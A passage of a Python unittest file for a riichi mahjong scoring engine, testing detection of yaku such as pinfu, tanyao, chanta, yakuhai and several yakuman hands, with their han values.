self.assertEqual(yaku_types.total_han, [])
def test_ikkitsuukan_closed(self): # 一気通貫
for i in range(1, 10):
self.player.hand[Tile(Suit.PINZU.value, i).index] += 1
self.player.hand[Tile(Suit.MANZU.value, 3).index] += 2
self.player.hand[Tile(Suit.SOUZU.value, 5).index] += 2
self.player.agari_tile = Tile(Suit.SOUZU.value, 5)
machi_tiles = check_tenpai(self.player.hand, self.player.kabe)
yaku_types = TeYaku(
self.player, self.stack, machi_tiles, self.bakaze, True)
self.assertEqual(yaku_types.ikkitsuukan(), True)
self.assertEqual(yaku_types.total_yaku, ['ikkitsuukan'])
self.assertEqual(yaku_types.total_han, [2])
def test_ikkitsuukan_opened(self): # 一気通貫
# 非門清
for i in range(4, 10):
self.player.hand[Tile(Suit.PINZU.value, i).index] += 1
self.player.hand[Tile(Suit.MANZU.value, 3).index] += 2
self.player.hand[Tile(Suit.SOUZU.value, 5).index] += 2
self.player.agari_tile = Tile(Suit.SOUZU.value, 5)
naki_tile = Tile(Suit.PINZU.value, 2)
naki_tile.owner = 3
self.player.kabe.append(
Huro(Naki.CHII, naki_tile,
[Tile(Suit.PINZU.value, i) for i in range(1, 4)]))
self.player.menzenchin = False
machi_tiles = check_tenpai(self.player.hand, self.player.kabe)
yaku_types = TeYaku(
self.player, self.stack, machi_tiles, self.bakaze, True)
self.assertEqual(yaku_types.ikkitsuukan(), True)
self.assertEqual(yaku_types.total_yaku, ['ikkitsuukan'])
self.assertEqual(yaku_types.total_han, [1])
def test_no_pinfu(self): # 平和
# 聽 3 6 9 筒
self.player.hand[Tile(Suit.MANZU.value, 1).index] += 1
self.player.hand[Tile(Suit.MANZU.value, 2).index] += 1
self.player.hand[Tile(Suit.MANZU.value, 3).index] += 1
self.player.hand[Tile(Suit.SOUZU.value, 2).index] += 1
self.player.hand[Tile(Suit.SOUZU.value, 3).index] += 1
self.player.hand[Tile(Suit.SOUZU.value, 4).index] += 1
self.player.hand[Tile(Suit.PINZU.value, 3).index] += 1
self.player.hand[Tile(Suit.PINZU.value, 4).index] += 1
self.player.hand[Tile(Suit.PINZU.value, 5).index] += 1
self.player.hand[Tile(Suit.PINZU.value, 6).index] += 2
self.player.hand[Tile(Suit.PINZU.value, 7).index] += 1
self.player.hand[Tile(Suit.PINZU.value, 8).index] += 1
self.player.agari_tile = Tile(Suit.PINZU.value, 3)
machi_tiles = check_tenpai(self.player.hand, self.player.kabe)
yaku_types = TeYaku(
self.player, self.stack, machi_tiles, self.bakaze, True)
self.assertEqual(yaku_types.pinfu(), False)
self.assertEqual(yaku_types.total_yaku, [])
self.assertEqual(yaku_types.total_han, [])
def test_no_pinfu_middle_wait(self): # 平和
# 坎張聽
self.player.hand[Tile(Suit.MANZU.value, 1).index] += 1
self.player.hand[Tile(Suit.MANZU.value, 2).index] += 1
self.player.hand[Tile(Suit.MANZU.value, 3).index] += 1
self.player.hand[Tile(Suit.SOUZU.value, 2).index] += 1
self.player.hand[Tile(Suit.SOUZU.value, 3).index] += 1
self.player.hand[Tile(Suit.SOUZU.value, 4).index] += 1
self.player.hand[Tile(Suit.SOUZU.value, 7).index] += 1
self.player.hand[Tile(Suit.SOUZU.value, 9).index] += 1
self.player.hand[Tile(Suit.PINZU.value, 2).index] += 2
self.player.hand[Tile(Suit.PINZU.value, 5).index] += 1
self.player.hand[Tile(Suit.PINZU.value, 6).index] += 1
self.player.hand[Tile(Suit.PINZU.value, 7).index] += 1
self.player.agari_tile = Tile(Suit.SOUZU.value, 8)
machi_tiles = check_tenpai(self.player.hand, self.player.kabe)
yaku_types = TeYaku(
self.player, self.stack, machi_tiles, self.bakaze, True)
self.assertEqual(yaku_types.pinfu(), False)
self.assertEqual(yaku_types.total_yaku, [])
self.assertEqual(yaku_types.total_han, [])
def test_pinfu(self): # 平和
self.player.hand[Tile(Suit.MANZU.value, 1).index] += 1
self.player.hand[Tile(Suit.MANZU.value, 2).index] += 1
self.player.hand[Tile(Suit.MANZU.value, 3).index] += 1
self.player.hand[Tile(Suit.SOUZU.value, 2).index] += 1
self.player.hand[Tile(Suit.SOUZU.value, 3).index] += 1
self.player.hand[Tile(Suit.SOUZU.value, 4).index] += 1
self.player.hand[Tile(Suit.SOUZU.value, 7).index] += 1
self.player.hand[Tile(Suit.SOUZU.value, 8).index] += 1
self.player.hand[Tile(Suit.PINZU.value, 5).index] += 1
self.player.hand[Tile(Suit.PINZU.value, 6).index] += 1
self.player.hand[Tile(Suit.PINZU.value, 7).index] += 1
self.player.hand[Tile(Suit.PINZU.value, 9).index] += 2
self.player.agari_tile = Tile(Suit.SOUZU.value, 9)
machi_tiles = check_tenpai(self.player.hand, self.player.kabe)
yaku_types = TeYaku(
self.player, self.stack, machi_tiles, self.bakaze, True)
self.assertEqual(yaku_types.pinfu(), True)
self.assertEqual(yaku_types.total_yaku, ['pinfu'])
self.assertEqual(yaku_types.total_han, [1])
def test_no_tanyao_closed(self): # 断么九
for i in range(1, 7):
self.player.hand[Tile(Suit.PINZU.value, i).index] += 1
self.player.hand[Tile(Suit.MANZU.value, 3).index] += 3
self.player.hand[Tile(Suit.MANZU.value, 8).index] += 2
self.player.hand[Tile(Suit.SOUZU.value, 5).index] += 2
self.player.agari_tile = Tile(Suit.SOUZU.value, 5)
machi_tiles = check_tenpai(self.player.hand, self.player.kabe)
yaku_types = TeYaku(
self.player, self.stack, machi_tiles, self.bakaze, True)
self.assertEqual(yaku_types.tanyao(), False)
self.assertEqual(yaku_types.total_yaku, [])
self.assertEqual(yaku_types.total_han, [])
def test_no_tanyao_opened(self): # 断么九
for i in range(2, 8):
self.player.hand[Tile(Suit.PINZU.value, i).index] += 1
self.player.hand[Tile(Suit.MANZU.value, 8).index] += 2
self.player.hand[Tile(Suit.SOUZU.value, 5).index] += 2
naki_tile = Tile(Suit.PINZU.value, 9)
naki_tile.owner = 3
self.player.kabe.append(
Huro(Naki.PON, naki_tile,
[Tile(Suit.PINZU.value, 9) for i in range(1, 4)]))
self.player.menzenchin = False
self.player.agari_tile = Tile(Suit.SOUZU.value, 5)
machi_tiles = check_tenpai(self.player.hand, self.player.kabe)
yaku_types = TeYaku(
self.player, self.stack, machi_tiles, self.bakaze, True)
self.assertEqual(yaku_types.tanyao(), False)
self.assertEqual(yaku_types.total_yaku, [])
self.assertEqual(yaku_types.total_han, [])
def test_tanyao_closed(self): # 断么九
for i in range(2, 8):
self.player.hand[Tile(Suit.PINZU.value, i).index] += 1
self.player.hand[Tile(Suit.MANZU.value, 3).index] += 3
self.player.hand[Tile(Suit.MANZU.value, 8).index] += 2
self.player.hand[Tile(Suit.SOUZU.value, 5).index] += 2
self.player.agari_tile = Tile(Suit.SOUZU.value, 5)
machi_tiles = check_tenpai(self.player.hand, self.player.kabe)
yaku_types = TeYaku(
self.player, self.stack, machi_tiles, self.bakaze, True)
self.assertEqual(yaku_types.tanyao(), True)
self.assertEqual(yaku_types.total_yaku, ['tanyao'])
self.assertEqual(yaku_types.total_han, [1])
def test_tanyao_opened(self): # 断么九
for i in range(2, 8):
self.player.hand[Tile(Suit.PINZU.value, i).index] += 1
self.player.hand[Tile(Suit.MANZU.value, 8).index] += 2
self.player.hand[Tile(Suit.SOUZU.value, 5).index] += 2
naki_tile = Tile(Suit.PINZU.value, 2)
naki_tile.owner = 3
self.player.kabe.append(
Huro(Naki.PON, naki_tile,
[Tile(Suit.PINZU.value, 2) for i in range(1, 4)]))
self.player.menzenchin = False
self.player.agari_tile = Tile(Suit.SOUZU.value, 5)
machi_tiles = check_tenpai(self.player.hand, self.player.kabe)
yaku_types = TeYaku(
self.player, self.stack, machi_tiles, self.bakaze, True)
self.assertEqual(yaku_types.tanyao(), True)
self.assertEqual(yaku_types.total_yaku, ['tanyao'])
self.assertEqual(yaku_types.total_han, [1])
class TestYakuhai(unittest.TestCase):
def setUp(self):
self.player = Player('test', 0)
self.stack = Stack()
self.bakaze = Jihai.TON
def test_no_daisangen(self): # 大三元
self.player.hand[Tile(Suit.JIHAI.value, Jihai.HAKU.value).index] += 2
self.player.hand[Tile(Suit.JIHAI.value, Jihai.HATSU.value).index] += 3
self.player.hand[Tile(Suit.SOUZU.value, 6).index] += 2
self.player.hand[Tile(Suit.MANZU.value, 8).index] += 3
naki_tile = Tile(Suit.JIHAI.value, Jihai.CHUN.value)
naki_tile.owner = 2
self.player.kabe.append(
Huro(Naki.PON, naki_tile,
[Tile(Suit.JIHAI.value, Jihai.CHUN.value)
for i in range(1, 4)]))
self.player.agari_tile = Tile(Suit.SOUZU.value, 6)
self.player.menzenchin = False
machi_tiles = check_tenpai(self.player.hand, self.player.kabe)
yaku_types = Yakuhai(
self.player, self.stack, machi_tiles, self.bakaze, True)
self.assertEqual(yaku_types.daisangen(), False)
self.assertEqual(yaku_types.total_yaku, [])
self.assertEqual(yaku_types.total_han, [])
def test_daisangen(self): # 大三元
self.player.hand[Tile(Suit.JIHAI.value, Jihai.HAKU.value).index] += 3
self.player.hand[Tile(Suit.JIHAI.value, Jihai.HATSU.value).index] += 3
self.player.hand[Tile(Suit.SOUZU.value, 6).index] += 2
self.player.hand[Tile(Suit.MANZU.value, 8).index] += 2
naki_tile = Tile(Suit.JIHAI.value, Jihai.CHUN.value)
naki_tile.owner = 2
self.player.kabe.append(
Huro(Naki.PON, naki_tile,
[Tile(Suit.JIHAI.value, Jihai.CHUN.value)
for i in range(1, 4)]))
self.player.agari_tile = Tile(Suit.SOUZU.value, 6)
self.player.menzenchin = False
machi_tiles = check_tenpai(self.player.hand, self.player.kabe)
yaku_types = Yakuhai(
self.player, self.stack, machi_tiles, self.bakaze, True)
self.assertEqual(yaku_types.daisangen(), True)
self.assertEqual(yaku_types.total_yaku, ['daisangen'])
self.assertEqual(yaku_types.total_han, [13])
def test_no_tsuuiisou(self): # 字一色
self.player.hand[Tile(Suit.JIHAI.value, Jihai.HAKU.value).index] += 3
self.player.hand[Tile(Suit.JIHAI.value, Jihai.HATSU.value).index] += 3
self.player.hand[Tile(Suit.SOUZU.value, 6).index] += 2
self.player.hand[Tile(Suit.JIHAI.value, Jihai.SHAA.value).index] += 2
naki_tile = Tile(Suit.JIHAI.value, Jihai.CHUN.value)
naki_tile.owner = 2
self.player.kabe.append(
Huro(Naki.PON, naki_tile,
[Tile(Suit.JIHAI.value, Jihai.CHUN.value)
for i in range(1, 4)]))
self.player.agari_tile = Tile(Suit.JIHAI.value, Jihai.SHAA.value)
self.player.menzenchin = False
machi_tiles = check_tenpai(self.player.hand, self.player.kabe)
yaku_types = Yakuhai(
self.player, self.stack, machi_tiles, self.bakaze, True)
self.assertEqual(yaku_types.tsuuiisou(), False)
self.assertEqual(yaku_types.total_yaku, [])
self.assertEqual(yaku_types.total_han, [])
def test_tsuuiisou(self): # 字一色
self.player.hand[Tile(Suit.JIHAI.value, Jihai.HAKU.value).index] += 3
self.player.hand[Tile(Suit.JIHAI.value, Jihai.HATSU.value).index] += 3
self.player.hand[Tile(Suit.JIHAI.value, Jihai.TON.value).index] += 2
self.player.hand[Tile(Suit.JIHAI.value, Jihai.SHAA.value).index] += 2
naki_tile = Tile(Suit.JIHAI.value, Jihai.CHUN.value)
naki_tile.owner = 2
self.player.kabe.append(
Huro(Naki.PON, naki_tile,
[Tile(Suit.JIHAI.value, Jihai.CHUN.value)
for i in range(1, 4)]))
self.player.agari_tile = Tile(Suit.JIHAI.value, Jihai.SHAA.value)
self.player.menzenchin = False
machi_tiles = check_tenpai(self.player.hand, self.player.kabe)
yaku_types = Yakuhai(
self.player, self.stack, machi_tiles, self.bakaze, True)
self.assertEqual(yaku_types.tsuuiisou(), True)
self.assertEqual(yaku_types.total_yaku, ['tsuuiisou'])
self.assertEqual(yaku_types.total_han, [13])
def test_no_daisuushii(self): # 大四喜
self.player.hand[Tile(Suit.JIHAI.value, Jihai.CHUN.value).index] += 3
self.player.hand[Tile(Suit.JIHAI.value, Jihai.NAN.value).index] += 3
self.player.hand[Tile(Suit.JIHAI.value, Jihai.SHAA.value).index] += 2
self.player.hand[Tile(Suit.JIHAI.value, Jihai.HAKU.value).index] += 2
naki_tile = Tile(Suit.JIHAI.value, Jihai.PEI.value)
naki_tile.owner = 2
self.player.kabe.append(
Huro(Naki.DAMINKAN, naki_tile,
[Tile(Suit.JIHAI.value, Jihai.PEI.value)
for i in range(1, 5)]))
self.player.agari_tile = Tile(Suit.JIHAI.value, Jihai.SHAA.value)
self.player.menzenchin = False
machi_tiles = check_tenpai(self.player.hand, self.player.kabe)
yaku_types = Yakuhai(
self.player, self.stack, machi_tiles, self.bakaze, True)
self.assertEqual(yaku_types.daisuushii(), False)
self.assertEqual(yaku_types.total_yaku, [])
self.assertEqual(yaku_types.total_han, [])
def test_daisuushii(self): # 大四喜
self.player.hand[Tile(Suit.JIHAI.value, Jihai.TON.value).index] += 3
self.player.hand[Tile(Suit.JIHAI.value, Jihai.NAN.value).index] += 3
self.player.hand[Tile(Suit.JIHAI.value, Jihai.SHAA.value).index] += 2
self.player.hand[Tile(Suit.JIHAI.value, Jihai.HAKU.value).index] += 2
naki_tile = Tile(Suit.JIHAI.value, Jihai.PEI.value)
naki_tile.owner = 2
self.player.kabe.append(
Huro(Naki.DAMINKAN, naki_tile,
[Tile(Suit.JIHAI.value, Jihai.PEI.value)
for i in range(1, 5)]))
self.player.agari_tile = Tile(Suit.JIHAI.value, Jihai.SHAA.value)
self.player.menzenchin = False
machi_tiles = check_tenpai(self.player.hand, self.player.kabe)
yaku_types = Yakuhai(
self.player, self.stack, machi_tiles, self.bakaze, True)
self.assertEqual(yaku_types.daisuushii(), True)
self.assertEqual(yaku_types.total_yaku, ['daisuushii'])
self.assertEqual(yaku_types.total_han, [13])
def test_shousuushii(self): # 小四喜
self.player.hand[Tile(Suit.JIHAI.value, Jihai.TON.value).index] += 3
self.player.hand[Tile(Suit.JIHAI.value, Jihai.NAN.value).index] += 3
self.player.hand[Tile(Suit.JIHAI.value, Jihai.SHAA.value).index] += 1
self.player.hand[Tile(Suit.JIHAI.value, Jihai.HAKU.value).index] += 3
naki_tile = Tile(Suit.JIHAI.value, Jihai.PEI.value)
naki_tile.owner = 2
self.player.kabe.append(
Huro(Naki.DAMINKAN, naki_tile,
[Tile(Suit.JIHAI.value, Jihai.PEI.value)
for i in range(1, 5)]))
self.player.agari_tile = Tile(Suit.JIHAI.value, Jihai.SHAA.value)
self.player.menzenchin = False
machi_tiles = check_tenpai(self.player.hand, self.player.kabe)
yaku_types = Yakuhai(
self.player, self.stack, machi_tiles, self.bakaze, True)
self.assertEqual(yaku_types.shousuushii(), True)
self.assertEqual(yaku_types.total_yaku, ['shousuushii'])
self.assertEqual(yaku_types.total_han, [13])
def test_no_shousangen(self): # 小三元
self.player.hand[Tile(Suit.JIHAI.value, Jihai.PEI.value).index] += 2
self.player.hand[Tile(Suit.JIHAI.value, Jihai.HATSU.value).index] += 3
self.player.hand[Tile(Suit.SOUZU.value, 6).index] += 2
self.player.hand[Tile(Suit.MANZU.value, 8).index] += 3
naki_tile = Tile(Suit.JIHAI.value, Jihai.CHUN.value)
naki_tile.owner = 2
self.player.kabe.append(
Huro(Naki.PON, naki_tile,
[Tile(Suit.JIHAI.value, Jihai.CHUN.value)
for i in range(1, 4)]))
self.player.agari_tile = Tile(Suit.SOUZU.value, 6)
self.player.menzenchin = False
machi_tiles = check_tenpai(self.player.hand, self.player.kabe)
yaku_types = Yakuhai(
self.player, self.stack, machi_tiles, self.bakaze, True)
self.assertEqual(yaku_types.shousangen(), False)
self.assertEqual(yaku_types.total_yaku, [])
self.assertEqual(yaku_types.total_han, [])
def test_shousangen(self): # 小三元
self.player.hand[Tile(Suit.JIHAI.value, Jihai.HAKU.value).index] += 2
self.player.hand[Tile(Suit.JIHAI.value, Jihai.HATSU.value).index] += 3
self.player.hand[Tile(Suit.SOUZU.value, 6).index] += 2
self.player.hand[Tile(Suit.MANZU.value, 8).index] += 3
naki_tile = Tile(Suit.JIHAI.value, Jihai.CHUN.value)
naki_tile.owner = 2
self.player.kabe.append(
Huro(Naki.PON, naki_tile,
[Tile(Suit.JIHAI.value, Jihai.CHUN.value)
for i in range(1, 4)]))
self.player.agari_tile = Tile(Suit.SOUZU.value, 6)
self.player.menzenchin = False
machi_tiles = check_tenpai(self.player.hand, self.player.kabe)
yaku_types = Yakuhai(
self.player, self.stack, machi_tiles, self.bakaze, True)
self.assertEqual(yaku_types.shousangen(), True)
self.assertEqual(yaku_types.total_yaku, ['shousangen'])
self.assertEqual(yaku_types.total_han, [2])
def test_yakuhai(self): # 役牌
self.player.hand[Tile(Suit.JIHAI.value, Jihai.NAN.value).index] += 2
self.player.hand[Tile(Suit.JIHAI.value, Jihai.TON.value).index] += 3
self.player.hand[Tile(Suit.SOUZU.value, 6).index] += 2
self.player.hand[Tile(Suit.MANZU.value, 8).index] += 3
naki_tile = Tile(Suit.JIHAI.value, Jihai.CHUN.value)
naki_tile.owner = 2
self.player.kabe.append(
Huro(Naki.PON, naki_tile,
[Tile(Suit.JIHAI.value, Jihai.CHUN.value)
for i in range(1, 4)]))
self.player.agari_tile = Tile(Suit.SOUZU.value, 6)
self.player.menzenchin = False
machi_tiles = check_tenpai(self.player.hand, self.player.kabe)
yaku_types = Yakuhai(
self.player, self.stack, machi_tiles, self.bakaze, True)
self.assertEqual(yaku_types.yakuhai(), True)
self.assertEqual(yaku_types.total_yaku,
['sangenpai_CHUN', 'bakaze_TON', 'jikaze_TON'])
self.assertEqual(yaku_types.total_han, [1, 1, 1])
class TestPeikou(unittest.TestCase):
def setUp(self):
self.player = Player('test', 0)
self.stack = Stack()
self.bakaze = Jihai.TON
def test_no_ryanpeikou(self): # 二盃口
for i in range(1, 4):
self.player.hand[Tile(Suit.MANZU.value, i).index] += 2
for i in range(4, 7):
self.player.hand[Tile(Suit.MANZU.value, i).index] += 1
self.player.hand[Tile(Suit.SOUZU.value, 5).index] += 1
naki_tile = Tile(Suit.MANZU.value, 5)
naki_tile.owner = 0
self.player.kabe.append(
Huro(Naki.CHII, naki_tile,
[Tile(Suit.MANZU.value, i) for i in range(4, 7)]))
self.player.agari_tile = Tile(Suit.SOUZU.value, 5)
self.player.menzenchin = False
machi_tiles = check_tenpai(self.player.hand, self.player.kabe)
yaku_types = Peikou(
self.player, self.stack, machi_tiles, self.bakaze, True)
self.assertEqual(yaku_types.ryanpeikou(), False)
self.assertEqual(yaku_types.total_yaku, [])
self.assertEqual(yaku_types.total_han, [])
def test_ryanpeikou(self): # 二盃口
for i in range(1, 7):
self.player.hand[Tile(Suit.MANZU.value, i).index] += 2
self.player.hand[Tile(Suit.SOUZU.value, 5).index] += 1
self.player.agari_tile = Tile(Suit.SOUZU.value, 5)
machi_tiles = check_tenpai(self.player.hand, self.player.kabe)
yaku_types = Peikou(
self.player, self.stack, machi_tiles, self.bakaze, True)
self.assertEqual(yaku_types.ryanpeikou(), True)
self.assertEqual(yaku_types.total_yaku, ['ryanpeikou'])
self.assertEqual(yaku_types.total_han, [3])
def test_no_iipeikou(self): # 一盃口
for i in range(1, 7):
self.player.hand[Tile(Suit.MANZU.value, i).index] += 1
self.player.hand[Tile(Suit.JIHAI.value, Jihai.NAN.value).index] += 3
self.player.hand[Tile(Suit.SOUZU.value, 5).index] += 1
naki_tile = Tile(Suit.MANZU.value, 5)
naki_tile.owner = 0
self.player.kabe.append(
Huro(Naki.CHII, naki_tile,
[Tile(Suit.MANZU.value, i) for i in range(4, 7)]))
self.player.agari_tile = Tile(Suit.SOUZU.value, 5)
self.player.menzenchin = False
machi_tiles = check_tenpai(self.player.hand, self.player.kabe)
yaku_types = Peikou(
self.player, self.stack, machi_tiles, self.bakaze, True)
self.assertEqual(yaku_types.iipeikou(), False)
self.assertEqual(yaku_types.total_yaku, [])
self.assertEqual(yaku_types.total_han, [])
def test_iipeikou(self): # 一盃口
for i in range(1, 4):
self.player.hand[Tile(Suit.MANZU.value, i).index] += 2
for i in range(4, 7):
self.player.hand[Tile(Suit.MANZU.value, i).index] += 1
self.player.hand[Tile(Suit.JIHAI.value, Jihai.NAN.value).index] += 3
self.player.hand[Tile(Suit.SOUZU.value, 5).index] += 1
self.player.agari_tile = Tile(Suit.SOUZU.value, 5)
machi_tiles = check_tenpai(self.player.hand, self.player.kabe)
yaku_types = Peikou(
self.player, self.stack, machi_tiles, self.bakaze, True)
self.assertEqual(yaku_types.iipeikou(), True)
self.assertEqual(yaku_types.total_yaku, ['iipeikou'])
self.assertEqual(yaku_types.total_han, [1])
class TestChanta(unittest.TestCase):
def setUp(self):
self.player = Player('test', 0)
self.stack = Stack()
self.bakaze = Jihai.TON
def test_no_chinroutou(self): # 清老頭
self.player.hand[Tile(Suit.MANZU.value, 2).index] += 3
self.player.hand[Tile(Suit.MANZU.value, 9).index] += 3
self.player.hand[Tile(Suit.SOUZU.value, 1).index] += 3
self.player.hand[Tile(Suit.SOUZU.value, 9).index] += 3
self.player.hand[Tile(Suit.PINZU.value, 1).index] += 1
naki_tile = Tile(Suit.SOUZU.value, 9)
naki_tile.owner = 2
self.player.kabe.append(
Huro(Naki.PON, naki_tile,
[Tile(Suit.SOUZU.value, 9) for i in range(1, 4)]))
self.player.agari_tile = Tile(Suit.PINZU.value, 1)
machi_tiles = check_tenpai(self.player.hand, self.player.kabe)
yaku_types = Chanta(
self.player, self.stack, machi_tiles, self.bakaze, True)
self.assertEqual(yaku_types.chinroutou(), False)
self.assertEqual(yaku_types.total_yaku, [])
self.assertEqual(yaku_types.total_han, [])
def test_chinroutou(self): # 清老頭
self.player.hand[Tile(Suit.MANZU.value, 1).index] += 3
self.player.hand[Tile(Suit.MANZU.value, 9).index] += 3
self.player.hand[Tile(Suit.SOUZU.value, 1).index] += 3
self.player.hand[Tile(Suit.SOUZU.value, 9).index] += 3
self.player.hand[Tile(Suit.PINZU.value, 1).index] += 1
naki_tile = Tile(Suit.SOUZU.value, 9)
naki_tile.owner = 2
self.player.kabe.append(
Huro(Naki.PON, naki_tile,
[Tile(Suit.SOUZU.value, 9) for i in range(1, 4)]))
self.player.agari_tile = Tile(Suit.PINZU.value, 1)
self.player.menzenchin = False
machi_tiles = check_tenpai(self.player.hand, self.player.kabe)
yaku_types = Chanta(
self.player, self.stack, machi_tiles, self.bakaze, True)
self.assertEqual(yaku_types.chinroutou(), True)
self.assertEqual(yaku_types.total_yaku, ['chinroutou'])
self.assertEqual(yaku_types.total_han, [13])
def test_no_honroutou(self): # 混老頭
self.player.hand[Tile(Suit.MANZU.value, 2).index] += 3
self.player.hand[Tile(Suit.MANZU.value, 9).index] += 3
self.player.hand[Tile(Suit.SOUZU.value, 1).index] += 3
self.player.hand[Tile(Suit.SOUZU.value, 9).index] += 3
self.player.hand[Tile(Suit.PINZU.value, 1).index] += 1
naki_tile = Tile(Suit.SOUZU.value, 9)
naki_tile.owner = 2
self.player.kabe.append(
Huro(Naki.PON, naki_tile,
[Tile(Suit.SOUZU.value, 9) for i in range(1, 4)]))
self.player.agari_tile = Tile(Suit.PINZU.value, 1)
self.player.menzenchin = False
machi_tiles = check_tenpai(self.player.hand, self.player.kabe)
yaku_types = Chanta(
self.player, self.stack, machi_tiles, self.bakaze, True)
self.assertEqual(yaku_types.honroutou(), False)
self.assertEqual(yaku_types.total_yaku, [])
self.assertEqual(yaku_types.total_han, [])
def test_honroutou(self): # 混老頭
self.player.hand[Tile(Suit.JIHAI.value, Jihai.CHUN.value).index] += 3
self.player.hand[Tile(Suit.MANZU.value, 9).index] += 3
self.player.hand[Tile(Suit.SOUZU.value, 1).index] += 3
self.player.hand[Tile(Suit.SOUZU.value, 9).index] += 3
self.player.hand[Tile(Suit.PINZU.value, 1).index] += 1
naki_tile = Tile(Suit.SOUZU.value, 9)
naki_tile.owner = 2
self.player.kabe.append(
Huro(Naki.PON, naki_tile,
[Tile(Suit.SOUZU.value, 9) for i in range(1, 4)]))
self.player.agari_tile = Tile(Suit.PINZU.value, 1)
self.player.menzenchin = False
machi_tiles = check_tenpai(self.player.hand, self.player.kabe)
yaku_types = Chanta(
self.player, self.stack, machi_tiles, self.bakaze, True)
self.assertEqual(yaku_types.honroutou(), True)
self.assertEqual(yaku_types.total_yaku, ['honroutou'])
self.assertEqual(yaku_types.total_han, [2])
def test_no_junchantaiyaochuu(self): # 純全帯么九
self.player.hand[Tile(Suit.MANZU.value, 4).index] += 3
self.player.hand[Tile(Suit.MANZU.value, 2).index] += 3
self.player.hand[Tile(Suit.MANZU.value, 3).index] += 3
self.player.hand[Tile(Suit.PINZU.value, 9).index] += 1
naki_tile = Tile(Suit.SOUZU.value, 9)
naki_tile.owner = 2
self.player.kabe.append(
Huro(Naki.PON, naki_tile,
[Tile(Suit.SOUZU.value, 9) for i in range(1, 4)]))
self.player.agari_tile = Tile(Suit.PINZU.value, 9)
self.player.menzenchin = False
machi_tiles = check_tenpai(self.player.hand, self.player.kabe)
yaku_types = Chanta(
self.player, self.stack, machi_tiles, self.bakaze, True)
self.assertEqual(yaku_types.junchantaiyaochuu(), False)
self.assertEqual(yaku_types.total_yaku, [])
self.assertEqual(yaku_types.total_han, [])
def test_junchantaiyaochuu_opened(self): # 純全帯么九
self.player.hand[Tile(Suit.MANZU.value, 1).index] += 3
self.player.hand[Tile(Suit.MANZU.value, 2).index] += 3
self.player.hand[Tile(Suit.MANZU.value, 3).index] += 3
self.player.hand[Tile(Suit.PINZU.value, 9).index] += 1
naki_tile = Tile(Suit.SOUZU.value, 9)
naki_tile.owner = 2
self.player.kabe.append(
Huro(Naki.PON, naki_tile,
[Tile(Suit.SOUZU.value, 9) for i in range(1, 4)]))
self.player.agari_tile = Tile(Suit.PINZU.value, 9)
self.player.menzenchin = False
machi_tiles = check_tenpai(self.player.hand, self.player.kabe)
yaku_types = Chanta(
self.player, self.stack, machi_tiles, self.bakaze, True)
self.assertEqual(yaku_types.junchantaiyaochuu(), True)
self.assertEqual(yaku_types.total_yaku, ['junchantaiyaochuu'])
self.assertEqual(yaku_types.total_han, [2])
def test_junchantaiyaochuu_closed(self): # 純全帯么九
self.player.hand[Tile(Suit.MANZU.value, 1).index] += 3
self.player.hand[Tile(Suit.MANZU.value, 2).index] += 3
self.player.hand[Tile(Suit.MANZU.value, 3).index] += 3
self.player.hand[Tile(Suit.SOUZU.value, 9).index] += 3
self.player.hand[Tile(Suit.PINZU.value, 9).index] += 1
self.player.agari_tile = Tile(Suit.PINZU.value, 9)
machi_tiles = check_tenpai(self.player.hand, self.player.kabe)
yaku_types = Chanta(
self.player, self.stack, machi_tiles, self.bakaze, True)
self.assertEqual(yaku_types.junchantaiyaochuu(), True)
self.assertEqual(yaku_types.total_yaku, ['junchantaiyaochuu'])
self.assertEqual(yaku_types.total_han, [3])
def test_no_chanta(self): # 混全帯么九
self.player.hand[Tile(Suit.MANZU.value, 1).index] += 3
self.player.hand[Tile(Suit.MANZU.value, 5).index] += 3
self.player.hand[Tile(Suit.MANZU.value, 9).index] += 3
self.player.hand[Tile(Suit.PINZU.value, 9).index] += 1
naki_tile = Tile(Suit.JIHAI.value, Jihai.CHUN.value)
naki_tile.owner = 2
self.player.kabe.append(
Huro(Naki.PON, naki_tile,
[Tile(Suit.JIHAI.value, Jihai.CHUN.value)
for i in range(1, 4)]))
self.player.agari_tile = Tile(Suit.PINZU.value, 9)
self.player.menzenchin = False
machi_tiles = check_tenpai(self.player.hand, self.player.kabe)
yaku_types = Chanta(
self.player, self.stack, machi_tiles, self.bakaze, True)
self.assertEqual(yaku_types.chanta(), False)
self.assertEqual(yaku_types.total_yaku, [])
self.assertEqual(yaku_types.total_han, [])
def test_chanta_opened(self): # 混全帯么九
self.player.hand[Tile(Suit.MANZU.value, 1).index] += 3
self.player.hand[Tile(Suit.MANZU.value, 2).index] += 3
self.player.hand[Tile(Suit.MANZU.value, 3).index] += 3
self.player.hand[Tile(Suit.PINZU.value, 9).index] += 1
naki_tile = Tile(Suit.JIHAI.value, Jihai.CHUN.value)
naki_tile.owner = 2
self.player.kabe.append(
Huro(Naki.PON, naki_tile,
[Tile(Suit.JIHAI.value, Jihai.CHUN.value)
for i in range(1, 4)]))
self.player.agari_tile = Tile(Suit.PINZU.value, 9)
self.player.menzenchin = False
machi_tiles = check_tenpai(self.player.hand, self.player.kabe)
yaku_types = Chanta(
self.player, self.stack, machi_tiles, self.bakaze, True)
self.assertEqual(yaku_types.chanta(), True)
self.assertEqual(yaku_types.total_yaku, ['chanta'])
self.assertEqual(yaku_types.total_han, [1])
def test_chanta_closed(self): # 混全帯么九
self.player.hand[Tile(Suit.MANZU.value, 1).index] += 3
self.player.hand[Tile(Suit.MANZU.value, 2).index] += 3
self.player.hand[Tile(Suit.MANZU.value, 3).index] += 3
self.player.hand[Tile(Suit.JIHAI.value, Jihai.CHUN.value).index] += 3
self.player.hand[Tile(Suit.PINZU.value, 9).index] += 1
self.player.agari_tile = Tile(Suit.PINZU.value, 9)
machi_tiles = check_tenpai(self.player.hand, self.player.kabe)
yaku_types = Chanta(
self.player, self.stack, machi_tiles, self.bakaze, True)
self.assertEqual(yaku_types.chanta(), True)
self.assertEqual(yaku_types.total_yaku, ['chanta'])
self.assertEqual(yaku_types.total_han, [2])
class TestKoutsu(unittest.TestCase):
def setUp(self):
self.player = Player('test', 0)
self.stack = Stack()
self.bakaze = Jihai.TON
def test_no_suuankou(self): # 四暗刻
self.player.hand[Tile(Suit.MANZU.value, 1).index] += 3
self.player.hand[Tile(Suit.SOUZU.value, 2).index] += 3
self.player.hand[Tile(Suit.PINZU.value, 3).index] += 1
self.player.hand[Tile(Suit.PINZU.value, 4).index] += 1
self.player.hand[Tile(Suit.PINZU.value, 5).index] += 1
self.player.hand[Tile(Suit.PINZU.value, 9).index] += 2
